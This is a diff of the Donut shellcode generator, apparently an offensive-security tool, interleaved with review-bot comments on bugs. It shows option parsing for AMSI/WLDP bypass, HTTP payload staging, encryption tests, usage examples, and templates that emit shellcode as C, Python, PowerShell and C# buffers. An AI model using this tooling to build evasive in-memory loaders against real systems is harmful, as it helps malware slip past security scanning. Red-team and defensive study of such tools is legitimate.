253 * Create a C# version of the generator.
254 * Create a donut.py generator that uses the same command-line parameters as donut.exe.
255 * Add support for HTTP proxies.
256 ~~* Find ways to simplify the shellcode if possible.~~
257 * Write a blog post on how to integrate donut into your tooling, debug it, customize it, and design payloads that work with it.
258 * ~~Dynamic Calls to DLL functions.~~
259 * Handle the ProcessExit event from AppDomain using unmanaged code.
260
261 Platform: UNKNOWN
262 Requires-Python: >=3.0
263 Description-Content-Type: text/markdown
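--- a/donut_shellcode.egg-info/SOURCES.txt
+++ b/donut_shellcode.egg-info/SOURCES.txt
@@ -1,103 +0,0 @@
-LICENSE
-MANIFEST.in
-Makefile
-Makefile.mingw
-Makefile.msvc
-README.md
-donut.c
-donutmodule.c
-encrypt.c
-hash.c
-setup.py
-version-release-notes.txt
-./donut.c
-./donutmodule.c
-./encrypt.c
-./hash.c
-./DonutTest/hello.c
-./DonutTest/testcase.c
-./include/mmap-windows.c
-./payload/activescript.c
-./payload/bypass.c
-./payload/clib.c
-./payload/getpc.c
-./payload/http_client.c
-./payload/inject.c
-./payload/inmem_dotnet.c
-./payload/inmem_pe.c
-./payload/inmem_script.c
-./payload/inmem_xsl.c
-./payload/payload.c
-./payload/peb.c
-./payload/runsc.c
-./payload/wscript.c
-./payload/exe2h/exe2h.c
-./payload/exe2h/mmap-windows.c
-./payload/test/api_test.c
-./payload/test/call_api_dll.c
-./payload/test/hello.c
-docs/2019-08-21-Python_Extension.md
-docs/2019-5-31-Apple-Fritter.md
-docs/2019-5-9-Introducing-Donut.md
-docs/api.html
-docs/api.md
-donut_shellcode.egg-info/PKG-INFO
-donut_shellcode.egg-info/SOURCES.txt
-donut_shellcode.egg-info/dependency_links.txt
-donut_shellcode.egg-info/top_level.txt
-donut_shellcode.egg-info/zip-safe
-include/donut.h
-include/encrypt.h
-include/hash.h
-include/mmap-windows.c
-include/mmap.h
-include/pe.h
-include/poppack.h
-include/pshpack1.h
-include/pshpack2.h
-include/pshpack4.h
-include/pshpack8.h
-include/wintypes.h
-lib/donut.h
-payload/Makefile.mingw
-payload/Makefile.msvc
-payload/activescript.c
-payload/activescript.h
-payload/amsi.h
-payload/bypass.c
-payload/call_api.asm
-payload/call_api_bin.h
-payload/clib.c
-payload/clr.h
-payload/getpc.c
-payload/http_client.c
-payload/inject.c
-payload/inmem_dotnet.c
-payload/inmem_pe.c
-payload/inmem_script.c
-payload/inmem_xsl.c
-payload/order.txt
-payload/payload.c
-payload/payload.h
-payload/payload_exe_x64.h
-payload/payload_exe_x86.h
-payload/peb.c
-payload/peb.h
-payload/runsc.c
-payload/winapi.h
-payload/wscript.c
-payload/wscript.h
-payload/xmldom.h
-payload/exe2h/Makefile
-payload/exe2h/Makefile.mingw
-payload/exe2h/Makefile.msvc
-payload/exe2h/exe2h.c
-payload/exe2h/exe2h.obj
-payload/exe2h/mmap-windows.c
-payload/exe2h/mmap-windows.obj
-payload/exe2h/mmap.h
-payload/test/api_test.c
-payload/test/call_api_dll.c
-payload/test/hello.c
-payload/test/hello.cs
-payload/test/rdt.cpp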
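--- a/donut_shellcode.egg-info/dependency_links.txt
+++ b/donut_shellcode.egg-info/dependency_links.txt
@@ -1 +0,0 @@
-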
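--- a/donut_shellcode.egg-info/top_level.txt
+++ b/donut_shellcode.egg-info/top_level.txt
@@ -1 +0,0 @@
-donut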
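--- a/donut_shellcode.egg-info/zip-safe
+++ b/donut_shellcode.egg-info/zip-safe
@@ -1 +0,0 @@
-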
3030 OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
3131 */
3232
33 #define PY_SSIZE_T_CLEAN
3334 #include <Python.h>
3435 #include "donut.h"
3536
36
3737 static PyObject *Donut_Create(PyObject *self, PyObject *args, PyObject *keywds) {
38 int *arch = NULL;
39 int *bypass = NULL;
40 char *appdomain = NULL;
41 char *file = NULL;
42 char *runtime = NULL;
43 char *url = NULL;
44 char *cls = NULL;
45 char *method = NULL;
46 char *params = NULL;
47
48 int err;
49
50 static char *kwlist[] = {"file", "url", "arch", "bypass", "cls", "method", "params", "runtime", "appdomain", NULL};
51 if (!PyArg_ParseTupleAndKeywords(args, keywds, "s|siisssss", kwlist, &file, &url, &arch, &bypass, &cls, &method, &params, &runtime, &appdomain)) {
38 char *input = NULL; // input file to execute in-memory
39
40 int arch = 0; // target CPU architecture or mode
41 int bypass = 0; // AMSI/WDLP bypassing behavior
42 int headers = 0; // Preserve PE headers behavior
43 int compress = 0; // compress input file
44 int entropy = 0; // whether to randomize API hashes and use encryption
45 int format = 0; // output format
46 int exit_opt = 0; // exit process or exit thread
47 int thread = 0; // run unmanaged entrypoint as a thread
48 char *oep = NULL; // creates new thread for loader and continues execution at specified address provided in hexadecimal format
49
50 char *output = NULL; // name of loader stored on disk
51
52 char *runtime = NULL; // runtime version
53 char *domain = NULL; // app domain name to use
54 char *cls = NULL; // class name
55 char *method = NULL; // method name
56
57 char *params = NULL; // parameters for method
58 int unicode = 0; // param is converted to unicode before being passed to unmanaged DLL function
59
60 char *decoy = NULL; // path of decoy module
61
62 char *server = NULL; // HTTP server to download module from
63 char *modname = NULL; // name of module stored on HTTP server
64
65 static char *kwlist[] = {
66 "file", "arch", "bypass", "headers", "compress", "entropy",
67 "format", "exit_opt", "thread", "oep", "output",
68 "runtime", "appdomain", "cls", "method", "params",
69 "unicode", "server", "url", "modname", NULL};
70
71 if (!PyArg_ParseTupleAndKeywords(
72 args, keywds, "s|iiiiiiiisssssssissss", kwlist, &input, &arch,
73 &bypass, &headers, &compress, &entropy, &format, &exit_opt, &thread,
74 &oep, &output, &runtime, &domain, &cls, &method, &params, &unicode,
75 &decoy, &server, &server, &modname))
76 {
5277 return NULL;
5378 }
5479
5681
5782 // zero initialize configuration
5883 memset(&c, 0, sizeof(c));
59
60 // default type is position independent code for dual-mode (x86 + amd64)
61 c.inst_type = DONUT_INSTANCE_PIC;
62 c.arch = DONUT_ARCH_X84;
63 c.bypass = DONUT_BYPASS_CONTINUE; // continues loading even if disabling AMSI/WLDP fails
64
84
85 // default settings
86 c.inst_type = DONUT_INSTANCE_EMBED; // file is embedded
87 c.arch = DONUT_ARCH_X84; // dual-mode (x86+amd64)
88 c.bypass = DONUT_BYPASS_CONTINUE; // continues loading even if disabling AMSI/WLDP fails
89 c.headers = DONUT_HEADERS_OVERWRITE;// overwrite PE header
90 c.format = DONUT_FORMAT_BINARY; // default output format
91 c.compress = DONUT_COMPRESS_NONE; // compression is disabled by default
92 c.entropy = DONUT_ENTROPY_DEFAULT; // enable random names + symmetric encryption by default
93 c.exit_opt = DONUT_OPT_EXIT_THREAD; // default behaviour is to exit the thread
94 c.unicode = 0; // command line will not be converted to unicode for unmanaged DLL function
95
96 // input file
97 if(input != NULL) {
98 strncpy(c.input, input, DONUT_MAX_NAME - 1);
99 }
100
65101 // target cpu architecture
66 if (arch != NULL) {
102 if(arch != 0) {
67103 c.arch = arch;
68104 }
69
70105 // bypass options
71 if (bypass != NULL) {
106 if(bypass != 0) {
72107 c.bypass = bypass;
73108 }
74
75 // name of appdomain to use
76 if (appdomain != NULL) {
77 strncpy(c.domain, appdomain, DONUT_MAX_NAME - 1);
78 }
79
80 // assembly to use
81 if (file != NULL) {
82 strncpy(c.file, file, DONUT_MAX_NAME - 1);
83 }
84
85 //runtime version to use
86 if (runtime != NULL) {
109 // headers options
110 if(headers != 0) {
111 c.headers = headers;
112 }
113 // class of .NET assembly
114 if(cls != NULL) {
115 strncpy(c.cls, cls, DONUT_MAX_NAME - 1);
116 }
117 // name of domain to use for .NET assembly
118 if(domain != NULL) {
119 strncpy(c.domain, domain, DONUT_MAX_NAME - 1);
120 }
121 // encryption options
122 if(entropy != 0) {
123 c.entropy = entropy;
124 }
125 // output format
126 if(format != 0) {
127 c.format = format;
128 }
129 // method of .NET assembly
130 if(method != NULL) {
131 strncpy(c.method, method, DONUT_MAX_NAME - 1);
132 }
133 // module name
134 if(modname != NULL) {
135 strncpy(c.modname, modname, DONUT_MAX_NAME - 1);
136 }
137 // output file for loader
138 if(output != NULL) {
139 strncpy(c.output, output, DONUT_MAX_NAME - 1);
140 }
141 // parameters to method, DLL function or command line for unmanaged EXE
142 if(params != NULL) {
143 strncpy(c.args, params, DONUT_MAX_NAME - 1);
144 }
145 // path of decoy file
146 if(decoy != NULL) {
147 strncpy(c.decoy, decoy, 2048);
148 }
149 // runtime version to use for .NET DLL / EXE
150 if(runtime != NULL) {
87151 strncpy(c.runtime, runtime, DONUT_MAX_NAME - 1);
88152 }
89
90 // url of remote assembly
91 if (url != NULL) {
92 strncpy(c.url, url, DONUT_MAX_URL - 2);
93 c.inst_type = DONUT_INSTANCE_URL;
94 }
95
96 // class
97 if (cls != NULL) {
98 strncpy(c.cls, cls, DONUT_MAX_NAME - 1);
99 }
100
101 // method or exported api symbol
102 if (method != NULL) {
103 strncpy(c.method, method, DONUT_MAX_NAME - 1);
104 }
105
106 // parameters to method/exported API
107 if (params != NULL) {
108 strncpy(c.param, params, sizeof(c.param) - 1);
109 }
110
111 err = DonutCreate(&c);
112
113 /*
114 if (!(c.pic_len > 0)) {
115 return NULL;
116 }
117 */
153 // run entrypoint of unmanaged EXE as a thread
154 if(thread != 0) {
155 c.thread = 1;
156 }
157 // server
158 if(server != NULL) {
159 strncpy(c.server, server, DONUT_MAX_NAME - 2);
160 c.inst_type = DONUT_INSTANCE_HTTP;
161 }
162 // convert param to unicode? only applies to unmanaged DLL function
163 if(unicode != 0) {
164 c.unicode = 1;
165 }
166 // call RtlExitUserProcess to terminate host process
167 if(exit_opt != 0) {
168 c.exit_opt = exit_opt;
169 }
170 // fork a new thread and execute address of original entry point
171 if(oep != NULL) {
172 c.oep = strtoull(oep, NULL, 16);
173 }
174 // pack/compress input file
175 if(compress != 0) {
176 c.compress = compress;
177 }
178
179 int err = DonutCreate(&c);
180
181 if(err != 0) {
182 PyErr_SetString(PyExc_RuntimeError, DonutError(err));
183 DonutDelete(&c);
184 return NULL;
185 }
118186
119187 PyObject *shellcode = Py_BuildValue("y#", c.pic, c.pic_len);
120188
130198 Donut_Create, // C wrapper function
131199 METH_VARARGS|METH_KEYWORDS,
132200 "Calls DonutCreate to generate shellcode for a .NET assembly" // documentation
133 }, {
134 NULL, NULL, 0, NULL
135 }
201 },
202
203 {NULL, NULL, 0, NULL}
136204 };
137205
138206 // modules definition
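Review bot: The keyword list and the format string in the new `PyArg_ParseTupleAndKeywords` call do not line up: `kwlist` holds 20 names and has no `"decoy"`, while `"s|iiiiiiiisssssssissss"` has 21 units and the call passes 21 output pointers. As written, the `server` keyword is stored into `decoy`, `url` and `modname` both land in `server`, and the last unit (`&modname`) has no keyword at all, which CPython is likely to reject at call time rather than parse. Passing `&server` twice suggests `server` and `url` are meant to be aliases, so the fix is one entry in the list: `"unicode", "decoy", "server", "url", "modname", NULL};`. Separately, `strncpy(c.decoy, decoy, 2048)` is the only copy here with a literal length; `sizeof(c.decoy) - 1` would keep it tied to the field, whose size is not visible in this section.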
3030
3131 #include "encrypt.h"
3232
33 #include <stdio.h>
34 #include <string.h>
35
3336 static void chaskey(void *mk, void *p) {
3437 uint32_t i,*w=p,*k=mk;
3538
5356 }
5457
5558 // encrypt/decrypt data in counter mode
56 void donut_encrypt(void *mk, void *ctr, void *data, size_t len) {
59 void donut_encrypt(void *mk, void *ctr, void *data, uint32_t len) {
5760 uint8_t x[CIPHER_BLK_LEN],
5861 *p=(uint8_t*)data,
5962 *c=(uint8_t*)ctr;
60 int i, r;
63 uint32_t i, r;
6164
6265 while(len) {
6366 // copy counter+nonce to local buffer
7780 len -= r; p += r;
7881
7982 // update counter
80 for(i=CIPHER_BLK_LEN;i>0;i--)
83 for(i=CIPHER_BLK_LEN;(int)i>0;i--)
8184 if(++c[i-1]) break;
8285 }
8386 }
8487
8588 #ifdef TEST
8689
90 #include <stdint.h>
8791 #include <stdio.h>
92 #include <stdlib.h>
8893 #include <string.h>
89 #include <stdint.h>
94 #include <sys/stat.h>
95 #include <inttypes.h>
96 #include <fcntl.h>
97
98 #if defined(_WIN32) || defined(_WIN64)
99 #define WINDOWS
100 #include <windows.h>
101 #pragma comment(lib, "advapi32.lib")
102 #else
103 #include <unistd.h>
104 #endif
105
106 void bin2hex(const char *str, void *bin, int len) {
107 int i;
108 uint8_t *p = (uint8_t*)bin;
109
110 printf("%s[%i] = { ", str, len);
111
112 for(i=0;i<len;i++) {
113 printf("0x%02x", p[i]);
114 if((i+1) != len) putchar(',');
115 }
116 printf(" };\n");
117 }
118
119 // generate test vector
120 void gen_crypto_tv(void *mk, void *ctr) {
121 uint8_t key[16], data[77], tmp[16];
122 int i, j;
123
124 memset(data, 0, sizeof(data));
125 memcpy(key, mk, 16);
126 memcpy(tmp, ctr, 16);
127
128 for(i=0; i<128; i++) {
129 donut_encrypt(key, tmp, data, sizeof(data));
130 // update key with first 16 bytes of ciphertext
131 for(j=0; j<16; j++) key[j] ^= data[j];
132 }
133 bin2hex("donut_crypt_tv", data, 16);
134 }
90135
91136 // 128-bit master key
92 uint8_t key[16] =
137 uint8_t key_tv[16] =
93138 { 0x56, 0x09, 0xe9, 0x68, 0x5f, 0x58, 0xe3, 0x29,
94139 0x40, 0xec, 0xec, 0x98, 0xc5, 0x22, 0x98, 0x2f };
95140
96141 // 128-bit plain text
97 uint8_t plain[16]=
142 uint8_t plain_tv[16]=
98143 { 0xb8, 0x23, 0x28, 0x26, 0xfd, 0x5e, 0x40, 0x5e,
99144 0x69, 0xa3, 0x01, 0xa9, 0x78, 0xea, 0x7a, 0xd8 };
100145
101146 // 128-bit cipher text
102 uint8_t cipher[16] =
147 uint8_t cipher_tv[16] =
103148 { 0xd5, 0x60, 0x8d, 0x4d, 0xa2, 0xbf, 0x34, 0x7b,
104149 0xab, 0xf8, 0x77, 0x2f, 0xdf, 0xed, 0xde, 0x07 };
105150
151 // 128-bit counter
152 uint8_t ctr_tv[16] =
153 { 0xd0, 0x01, 0x36, 0x9b, 0xef, 0x6a, 0xa1, 0x05,
154 0x1d, 0x2d, 0x21, 0x98, 0x19, 0x8d, 0x88, 0x93 };
155
156 // 128-bit ciphertext for testing donut_encrypt
157 uint8_t donut_crypt_tv[16] =
158 { 0xd0, 0x01, 0x36, 0x9b, 0xef, 0x6a, 0xa1, 0x05,
159 0x1d, 0x2d, 0x21, 0x98, 0x19, 0x8d, 0x8b, 0x13 };
160
161 int crypto_test(void) {
162 uint8_t key[16], data[77], tmp[16];
163 int i, j;
164
165 memset(data, 0, sizeof(data));
166 memcpy(key, key_tv, 16);
167 memcpy(tmp, ctr_tv, 16);
168
169 for(i=0; i<128; i++) {
170 // encrypt data
171 donut_encrypt(key, tmp, data, sizeof(data));
172 // update key with first 16 bytes of ciphertext
173 for(j=0; j<16; j++) key[j] ^= data[j];
174 }
175 return (memcmp(tmp, donut_crypt_tv, 16) == 0);
176 }
177
106178 int main(void) {
107 uint8_t data[16];
179 uint8_t tmp1[16];
108180 int equ;
109181
110 memcpy(data, plain, 16);
111 chaskey(key, data);
112 equ = (memcmp(data, cipher, 16)==0);
182 // Chaskey test
183 memcpy(tmp1, plain_tv, 16);
184 chaskey(key_tv, tmp1);
185 equ = (memcmp(tmp1, cipher_tv, 16)==0);
113186 printf("Chaskey test : %s\n", equ ? "OK" : "FAILED");
187 printf("Donut Encrypt test : %s\n", crypto_test() ? "OK" : "FAILED");
114188 return 0;
115189 }
116190
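Review bot: `crypto_test()` compares `tmp`, the counter buffer, against `donut_crypt_tv`, so the new "Donut Encrypt test" never looks at any ciphertext. The expected vector differs from `ctr_tv` only in its last two bytes, which is consistent with it being the incremented counter rather than encrypted data, and `gen_crypto_tv()` prints `data`, not `tmp`, so the generator and the check disagree. A wrong keystream in `donut_encrypt` would still print OK as long as the counter update works. Compare the output buffer instead, `return (memcmp(data, donut_crypt_tv, 16) == 0);`, and regenerate `donut_crypt_tv` from `gen_crypto_tv(key_tv, ctr_tv)`.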
0
1 // dynamic example (doesn't work with .NET DLL)
2 // odzhan
3
4 #include "donut.h"
5
6 int main(int argc, char *argv[]) {
7 DONUT_CONFIG c;
8 int err;
9
10 // function pointers
11 DonutCreate_t _DonutCreate;
12 DonutDelete_t _DonutDelete;
13 DonutError_t _DonutError;
14
15 // need at least a file
16 if(argc != 2) {
17 printf(" [ usage: donut_dynamic <file>\n");
18 return 0;
19 }
20
21 // try load donut.dll or donut.so
22 #if defined(WINDOWS)
23 HMODULE m = LoadLibrary("donut.dll");
24 if(m != NULL) {
25 _DonutCreate = (DonutCreate_t)GetProcAddress(m, "DonutCreate");
26 _DonutDelete = (DonutDelete_t)GetProcAddress(m, "DonutDelete");
27 _DonutError = (DonutError_t) GetProcAddress(m, "DonutError");
28
29 if(_DonutCreate == NULL || _DonutDelete == NULL || _DonutError == NULL) {
30 printf(" [ Unable to resolve Donut API.\n");
31 return 0;
32 }
33 } else {
34 printf(" [ Unable to load donut.dll.\n");
35 return 0;
36 }
37 #else
38 void *m = dlopen("donut.so", RTLD_LAZY);
39 if(m != NULL) {
40 _DonutCreate = (DonutCreate_t)dlsym(m, "DonutCreate");
41 _DonutDelete = (DonutDelete_t)dlsym(m, "DonutDelete");
42 _DonutError = (DonutError_t) dlsym(m, "DonutError");
43
44 if(_DonutCreate == NULL || _DonutDelete == NULL || _DonutError == NULL) {
45 printf(" [ Unable to resolve Donut API.\n");
46 return 0;
47 }
48 } else {
49 printf(" [ Unable to load donut.so.\n");
50 return 0;
51 }
52 #endif
53
54 memset(&c, 0, sizeof(c));
55
56 // copy input file
57 lstrcpyn(c.input, argv[1], DONUT_MAX_NAME-1);
58
59 // default settings
60 c.inst_type = DONUT_INSTANCE_EMBED; // file is embedded
61 c.arch = DONUT_ARCH_X84; // dual-mode (x86+amd64)
62 c.bypass = DONUT_BYPASS_CONTINUE; // continues loading even if disabling AMSI/WLDP fails
63 c.headers = DONUT_HEADERS_OVERWRITE;// overwrite PE headers
64 c.format = DONUT_FORMAT_BINARY; // default output format
65 c.compress = DONUT_COMPRESS_NONE; // compression is disabled by default
66 c.entropy = DONUT_ENTROPY_DEFAULT; // enable random names + symmetric encryption by default
67 c.exit_opt = DONUT_OPT_EXIT_THREAD; // default behaviour is to exit the thread
68 c.thread = 1; // run entrypoint as a thread
69 c.unicode = 0; // command line will not be converted to unicode for unmanaged DLL function
70
71 // generate the shellcode
72 err = _DonutCreate(&c);
73 if(err != DONUT_ERROR_SUCCESS) {
74 printf(" [ Error : %s\n", _DonutError(err));
75 return 0;
76 }
77
78 printf(" [ loader saved to %s\n", c.output);
79
80 _DonutDelete(&c);
81 return 0;
82 }
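Review bot: `LoadLibrary("donut.dll")` and `dlopen("donut.so", RTLD_LAZY)` load the library by bare name, so whichever copy the platform's search order finds first supplies the `DonutCreate` that runs. Since this is an example people will copy into their own tools, pin the location: `LoadLibraryEx("donut.dll", NULL, LOAD_LIBRARY_SEARCH_APPLICATION_DIR)` on Windows, and a path containing a slash for `dlopen`. Every failure branch here, and in the static example that follows, also returns 0, so a calling script cannot tell a failed run from a successful one; `return 1;` on those paths fixes that.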
0
1 // static example (doesn't work with .NET DLL)
2 // odzhan
3
4 #include "donut.h"
5
6 int main(int argc, char *argv[]) {
7 DONUT_CONFIG c;
8 int err;
9
10 // need at least a file
11 if(argc != 2) {
12 printf(" [ usage: donut_static <file>\n");
13 return 0;
14 }
15
16 memset(&c, 0, sizeof(c));
17
18 // copy input file
19 lstrcpyn(c.input, argv[1], DONUT_MAX_NAME-1);
20
21 // default settings
22 c.inst_type = DONUT_INSTANCE_EMBED; // file is embedded
23 c.arch = DONUT_ARCH_X84; // dual-mode (x86+amd64)
24 c.bypass = DONUT_BYPASS_CONTINUE; // continues loading even if disabling AMSI/WLDP fails
25 c.headers = DONUT_HEADERS_OVERWRITE;// overwrite PE headers
26 c.format = DONUT_FORMAT_BINARY; // default output format
27 c.compress = DONUT_COMPRESS_NONE; // compression is disabled by default
28 c.entropy = DONUT_ENTROPY_DEFAULT; // enable random names + symmetric encryption by default
29 c.exit_opt = DONUT_OPT_EXIT_THREAD; // default behaviour is to exit the thread
30 c.thread = 1; // run entrypoint as a thread
31 c.unicode = 0; // command line will not be converted to unicode for unmanaged DLL function
32
33 // generate the shellcode
34 err = DonutCreate(&c);
35 if(err != DONUT_ERROR_SUCCESS) {
36 printf(" [ Error : %s\n", DonutError(err));
37 return 0;
38 }
39
40 printf(" [ loader saved to %s\n", c.output);
41
42 DonutDelete(&c);
43 return 0;
44 }
0 /**
1 BSD 3-Clause License
2
3 Copyright (c) 2019, TheWover, Odzhan. All rights reserved.
4
5 Redistribution and use in source and binary forms, with or without
6 modification, are permitted provided that the following conditions are met:
7
8 * Redistributions of source code must retain the above copyright notice, this
9 list of conditions and the following disclaimer.
10
11 * Redistributions in binary form must reproduce the above copyright notice,
12 this list of conditions and the following disclaimer in the documentation
13 and/or other materials provided with the distribution.
14
15 * Neither the name of the copyright holder nor the names of its
16 contributors may be used to endorse or promote products derived from
17 this software without specific prior written permission.
18
19 THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
20 AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
21 IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
22 DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE
23 FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
24 DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
25 SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
26 CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
27 OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
28 OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
29 */
30
31 #include "format.h"
32
33 /**
34 Encoding: base64
35 Author : Odzhan
36
37 Encoding: c, python, ruby, c#, powershell and hex
38 Author : BITAM Salim https://github.com/soolidsnake
39 */
40
41 // calculate length of buffer required for base64 encoding
42 #define B64_LEN(N) (((4 * (N / 3)) + 4) & -4)
43
44 static const char b64_tbl[] =
45 "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/";
46
47 // Compact implementation of base64 encoding.
48 // The main encoding loop is inspired by Qkumba AKA Peter Ferrie.
49 // This uses a lookup table and accounts for unaligned input.
50 //
51 // odzhan
52 //
53 static int b64_encode(
54 const void *src, uint32_t inlen,
55 void *dst, uint32_t *outlen)
56 {
57 uint32_t i, len, x;
58 uint8_t *in = (uint8_t*)src, *out = (uint8_t*)dst;
59
60 // check arguments
61 if(outlen == NULL) return 0;
62
63 // calculate length of buffer required for encoded string
64 len = B64_LEN(inlen);
65
66 // return the length?
67 if(out == NULL) {
68 *outlen = len;
69 return 1;
70 }
71
72 // can buffer contain string?
73 if(len > *outlen) return 0;
74
75 // main encoding loop
76 while(inlen != 0) {
77 // load 3 bytes or whatever remains
78 for(x=i=0; i<3; i++) {
79 // add byte from input or zero
80 x |= ((i < inlen) ? *in++ : 0);
81 x <<= 8;
82 }
83 // increase by 1
84 inlen++;
85 // encode 3 bytes
86 for(i=4; inlen && i>0; i--) {
87 x = ROTL32(x, 6);
88 *out++ = b64_tbl[x % 64];
89 --inlen;
90 }
91 }
92 // if required, add padding
93 while(i!=0) { *out++ = '='; i--; }
94 // add null terminator
95 *out = 0;
96 // calculate output length by subtracting 2 pointers
97 *outlen = (uint32_t)(out - (uint8_t*)dst);
98 return 1;
99 }
100
101 int base64_template(void *pic, uint32_t pic_len, FILE *fd) {
102 uint32_t outlen;
103 void *base64;
104
105 DPRINT("Calculating length of base64 encoding");
106 if(b64_encode(NULL, pic_len, NULL, &outlen)) {
107 DPRINT("Required length is %"PRId32, outlen);
108 base64 = calloc(1, outlen + 1);
109 if(base64 == NULL) {
110 return DONUT_ERROR_NO_MEMORY;
111 }
112 DPRINT("Encoding shellcode");
113 if(b64_encode(pic, pic_len, base64, &outlen)) {
114 DPRINT("Writing %"PRId32 " bytes to file", outlen);
115 fwrite(base64, 1, outlen, fd);
116 }
117 }
118 // if on windows, copy base64 string to clipboard
119 #if defined(WINDOWS)
120 LPTSTR strCopy;
121 HGLOBAL hCopy;
122
123 DPRINT("Opening clipboard");
124 if(OpenClipboard(NULL)) {
125 DPRINT("Empying contents");
126 EmptyClipboard();
127
128 DPRINT("Allocating memory");
129 hCopy = GlobalAlloc(GMEM_MOVEABLE, outlen);
130 if(hCopy != NULL) {
131 strCopy = GlobalLock(hCopy);
132 // copy base64 string to memory
133 CopyMemory(strCopy, base64, outlen);
134 GlobalLock(hCopy);
135 DPRINT("Setting clipboard data");
136 // copy to clipboard
137 SetClipboardData(CF_TEXT, hCopy);
138 GlobalFree(hCopy);
139 }
140 CloseClipboard();
141 }
142 #endif
143 DPRINT("Freeing memory");
144 free(base64);
145 return DONUT_ERROR_OK;
146 }
147
148 int c_ruby_template(void * pic, uint32_t pic_len, FILE* fd){
149 uint32_t j;
150 uint8_t *p = (uint8_t*)pic;
151
152 fprintf(fd, "unsigned char buf[] = \n");
153
154 for(j=0; j < pic_len; j++) {
155 if(j % 16 == 0) fputc('\"', fd);
156
157 fprintf(fd, "\\x%02x", p[j]);
158
159 if(j % 16 == 15 && j+1 < pic_len){
160 fprintf(fd, "\"\n");
161 }
162 }
163 fprintf(fd, "\";\n");
164
165 return DONUT_ERROR_OK;
166 }
167
168 int py_template(void * pic, uint32_t pic_len, FILE* fd){
169 uint32_t j;
170 uint8_t *p = (uint8_t*)pic;
171
172 fprintf(fd, "buf = \"\"\n");
173
174 for(j=0; j < pic_len; j++){
175 if(j % 16 == 0) {
176 fprintf(fd, "buff += \"");
177 }
178 fprintf(fd, "\\x%02x", p[j]);
179
180 if(j % 16 == 15) {
181 fprintf(fd, "\"\n");
182 }
183 }
184 if(j % 16 != 0) {
185 fputc('\"', fd);
186 }
187 return DONUT_ERROR_OK;
188 }
189
190 int powershell_template(void * pic, uint32_t pic_len, FILE* fd){
191 uint32_t j;
192 uint8_t *p = (uint8_t*)pic;
193
194 fprintf(fd, "[Byte[]] $buf = ");
195
196 for(j=0; j < pic_len; j++){
197 fprintf(fd, "0x%02x", p[j]);
198 if(j < pic_len-1) fputc(',', fd);
199 }
200 return DONUT_ERROR_OK;
201 }
202
203 int csharp_template(void * pic, uint32_t pic_len, FILE* fd){
204 uint32_t j;
205 uint8_t *p = (uint8_t*)pic;
206
207 fprintf(fd, "byte[] my_buf = new byte[%" PRId32"] {\n", pic_len);
208
209 for(j=0; j < pic_len; j++){
210 fprintf(fd, "0x%02x", p[j]);
211 if(j < pic_len-1) fputc(',', fd);
212 }
213 fprintf(fd, "};");
214
215 return DONUT_ERROR_OK;
216 }
217
218 int hex_template(void * pic, uint32_t pic_len, FILE* fd){
219 uint32_t j;
220 uint8_t *p = (uint8_t*)pic;
221
222 for(j=0; j < pic_len; j++){
223 fprintf(fd, "\\x%02x", p[j]);
224 }
225 return DONUT_ERROR_OK;
226 }
227
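Review bot: In `base64_template`, the Windows clipboard block passes `hCopy` to `SetClipboardData` and then calls `GlobalFree(hCopy)`, which frees memory the clipboard owns once that call has succeeded. The line before it calls `GlobalLock` a second time where `GlobalUnlock` was evidently intended, and `GlobalAlloc(GMEM_MOVEABLE, outlen)` leaves no room for the NUL terminator that `CF_TEXT` data needs. Separately, `b64_encode` reads `i` uninitialised in the padding loop `while(i!=0)` when `inlen` is 0, because the main loop that assigns it never runs; writing `uint32_t i = 0, len, x;` closes that, though whether a zero `pic_len` can reach this function is not visible here. A corrected clipboard block is sketched below.

```c
// … unchanged: OpenClipboard / EmptyClipboard …
hCopy = GlobalAlloc(GMEM_MOVEABLE, outlen + 1);
if(hCopy != NULL) {
  strCopy = GlobalLock(hCopy);
  if(strCopy != NULL) {
    // copy the base64 string together with its NUL terminator
    CopyMemory(strCopy, base64, outlen + 1);
    GlobalUnlock(hCopy);
    // on success the clipboard owns hCopy; free it only on failure
    if(SetClipboardData(CF_TEXT, hCopy) == NULL) GlobalFree(hCopy);
  } else {
    GlobalFree(hCopy);
  }
}
// … unchanged: CloseClipboard …
```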
0 # Generators
1
2 This folder contains Donut generators written in other languages than C. They are all developed by third-parties and are maintained separately, but are linked here as submodules. To clone Donut along with the submodules, run:
3
4 ```
5 git clone https://github.com/TheWover/donut.git --recursive
6 ```
+230
-23
hash.c less more
5353 t = k[3];
5454 k[3] = (ROTR32(k[1], 8) + k[0]) ^ i;
5555 k[0] = ROTR32(k[0],29) ^ k[3];
56 k[1] = k[2]; k[2] = t;
56
57 k[1] = k[2];
58 k[2] = t;
5759 }
5860 // return 64-bit ciphertext
5961 return x.q;
107109
108110 #ifdef TEST
109111
112 #include <stdint.h>
110113 #include <stdio.h>
111114 #include <stdlib.h>
112115 #include <string.h>
116 #include <sys/stat.h>
117 #include <inttypes.h>
118 #include <fcntl.h>
119
120 #if defined(_WIN32) || defined(_WIN64)
121 #define WINDOWS
122 #include <windows.h>
123 #pragma comment(lib, "advapi32.lib")
124 #else
125 #include <unistd.h>
126 #endif
127
128 // ******************************
129 // test vectors for SPECK-64/128
130 //
131 // 128-bit key
132 uint8_t key64[16]=
133 { 0x00, 0x01, 0x02, 0x03,
134 0x08, 0x09, 0x0a, 0x0b,
135 0x10, 0x11, 0x12, 0x13,
136 0x18, 0x19, 0x1a, 0x1b };
137
138 // 64-bit plain text
139 uint8_t plain64[8]=
